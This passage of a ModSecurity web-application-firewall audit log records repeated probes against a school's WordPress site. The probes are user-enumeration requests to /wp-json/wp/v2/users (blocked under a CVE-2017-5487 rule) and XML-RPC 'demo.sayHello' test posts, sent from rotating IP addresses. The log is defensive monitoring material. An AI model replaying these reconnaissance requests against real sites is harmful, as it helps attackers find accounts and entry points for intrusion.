Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da6c7570-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da6c7570-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746312613763123 3143 (- - -) Stopwatch2: 1746312613763123 3143; combined=1322, p1=464, p2=828, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da6c7570-Z-- --9515cf69-A-- [04/May/2025:05:50:21 +0700] aBadrdsVQyl9V2B8Pt-tyQAAAEg 103.236.140.4 55818 103.236.140.4 8181 --9515cf69-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9515cf69-C-- demo.sayHello --9515cf69-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9515cf69-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746312621785856 5316 (- - -) Stopwatch2: 1746312621785856 5316; combined=3981, p1=542, p2=3223, p3=22, p4=25, p5=98, sr=110, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9515cf69-Z-- --f3e36265-A-- [04/May/2025:06:11:56 +0700] aBaivGJEE9ao5dcyYWnuKAAAAIE 103.236.140.4 33904 103.236.140.4 8181 --f3e36265-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3e36265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3e36265-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746313916045928 3208 (- - -) Stopwatch2: 1746313916045928 3208; combined=1425, p1=490, p2=904, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3e36265-Z-- --02360220-A-- [04/May/2025:06:12:01 +0700] aBaiwechPF6irSergtv8ewAAANE 103.236.140.4 33908 103.236.140.4 8181 --02360220-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02360220-C-- demo.sayHello --02360220-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02360220-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746313921957914 6581 (- - -) Stopwatch2: 1746313921957914 6581; combined=4782, p1=635, p2=3893, p3=38, p4=43, p5=102, sr=85, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02360220-Z-- --8331d315-A-- [04/May/2025:06:14:04 +0700] aBajPOchPF6irSergtv8fAAAANA 103.236.140.4 33918 103.236.140.4 8181 --8331d315-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8331d315-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8331d315-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314044139908 3390 (- - -) Stopwatch2: 1746314044139908 3390; combined=1446, p1=477, p2=938, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8331d315-Z-- --567b176c-A-- [04/May/2025:06:14:08 +0700] aBajQNsVQyl9V2B8Pt-vxAAAAEU 103.236.140.4 33922 103.236.140.4 8181 --567b176c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --567b176c-C-- demo.sayHello --567b176c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --567b176c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314048987300 5340 (- - -) Stopwatch2: 1746314048987300 5340; combined=4002, p1=496, p2=3294, p3=30, p4=30, p5=90, sr=70, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --567b176c-Z-- --31bf8641-A-- [04/May/2025:06:14:50 +0700] aBajatsVQyl9V2B8Pt-vxQAAAEc 103.236.140.4 33930 103.236.140.4 8181 --31bf8641-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --31bf8641-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31bf8641-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314090085806 3430 (- - -) Stopwatch2: 1746314090085806 3430; combined=1494, p1=535, p2=928, p3=0, p4=0, p5=31, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31bf8641-Z-- --55a94322-A-- [04/May/2025:06:14:55 +0700] aBajb_nZiHJYHUAF8QfblQAAAAQ 103.236.140.4 33934 103.236.140.4 8181 --55a94322-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --55a94322-C-- demo.sayHello --55a94322-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --55a94322-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314095742759 6451 (- - -) Stopwatch2: 1746314095742759 6451; combined=4660, p1=636, p2=3774, p3=40, p4=39, p5=100, sr=119, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55a94322-Z-- --ee13a11c-A-- [04/May/2025:06:15:14 +0700] aBajgtsVQyl9V2B8Pt-vxwAAAEo 103.236.140.4 33938 103.236.140.4 8181 --ee13a11c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ee13a11c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee13a11c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314114158409 3396 (- - -) Stopwatch2: 1746314114158409 3396; combined=1453, p1=464, p2=956, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee13a11c-Z-- --08cdcb3b-A-- [04/May/2025:06:15:23 +0700] aBaji9sVQyl9V2B8Pt-vyAAAAEw 103.236.140.4 33942 103.236.140.4 8181 --08cdcb3b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.91 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --08cdcb3b-C-- demo.sayHello --08cdcb3b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --08cdcb3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314123460262 5703 (- - -) Stopwatch2: 1746314123460262 5703; combined=4235, p1=499, p2=3526, p3=25, p4=26, p5=93, sr=69, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08cdcb3b-Z-- --8703370d-A-- [04/May/2025:06:15:54 +0700] aBajqtsVQyl9V2B8Pt-vzAAAAFI 103.236.140.4 33952 103.236.140.4 8181 --8703370d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8703370d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8703370d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314154198843 3492 (- - -) Stopwatch2: 1746314154198843 3492; combined=1564, p1=522, p2=1010, p3=0, p4=0, p5=31, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8703370d-Z-- --71942c67-A-- [04/May/2025:06:16:01 +0700] aBajsWJEE9ao5dcyYWnuLgAAAIg 103.236.140.4 33956 103.236.140.4 8181 --71942c67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71942c67-C-- demo.sayHello --71942c67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71942c67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314161912694 6568 (- - -) Stopwatch2: 1746314161912694 6568; combined=4877, p1=635, p2=3958, p3=45, p4=53, p5=113, sr=77, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71942c67-Z-- --7b90577e-A-- [04/May/2025:06:16:26 +0700] aBajytsVQyl9V2B8Pt-v0AAAAFY 103.236.140.4 33962 103.236.140.4 8181 --7b90577e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7b90577e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b90577e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314186800781 3482 (- - -) Stopwatch2: 1746314186800781 3482; combined=1526, p1=532, p2=962, p3=0, p4=0, p5=32, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b90577e-Z-- --8c29d408-A-- [04/May/2025:06:16:37 +0700] aBaj1dsVQyl9V2B8Pt-v0gAAAFc 103.236.140.4 33966 103.236.140.4 8181 --8c29d408-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8c29d408-C-- demo.sayHello --8c29d408-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c29d408-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314197327757 5332 (- - -) Stopwatch2: 1746314197327757 5332; combined=3991, p1=537, p2=3243, p3=28, p4=30, p5=90, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c29d408-Z-- --6ae6135a-A-- [04/May/2025:06:16:42 +0700] aBaj2tsVQyl9V2B8Pt-v1AAAAEM 103.236.140.4 33970 103.236.140.4 8181 --6ae6135a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6ae6135a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ae6135a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314202487851 1951 (- - -) Stopwatch2: 1746314202487851 1951; combined=951, p1=313, p2=612, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ae6135a-Z-- --a999df18-A-- [04/May/2025:06:17:31 +0700] aBakC_nZiHJYHUAF8QfbmAAAAAo 103.236.140.4 33990 103.236.140.4 8181 --a999df18-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a999df18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a999df18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314251744915 2808 (- - -) Stopwatch2: 1746314251744915 2808; combined=1401, p1=462, p2=907, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a999df18-Z-- --87eeba7d-A-- [04/May/2025:06:17:38 +0700] aBakEmJEE9ao5dcyYWnuMAAAAIs 103.236.140.4 33994 103.236.140.4 8181 --87eeba7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87eeba7d-C-- demo.sayHello --87eeba7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87eeba7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314258323389 5901 (- - -) Stopwatch2: 1746314258323389 5901; combined=4368, p1=541, p2=3598, p3=38, p4=37, p5=93, sr=75, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87eeba7d-Z-- --b91b2b59-A-- [04/May/2025:06:17:55 +0700] aBakI_nZiHJYHUAF8QfbmgAAAAw 103.236.140.4 33998 103.236.140.4 8181 --b91b2b59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: 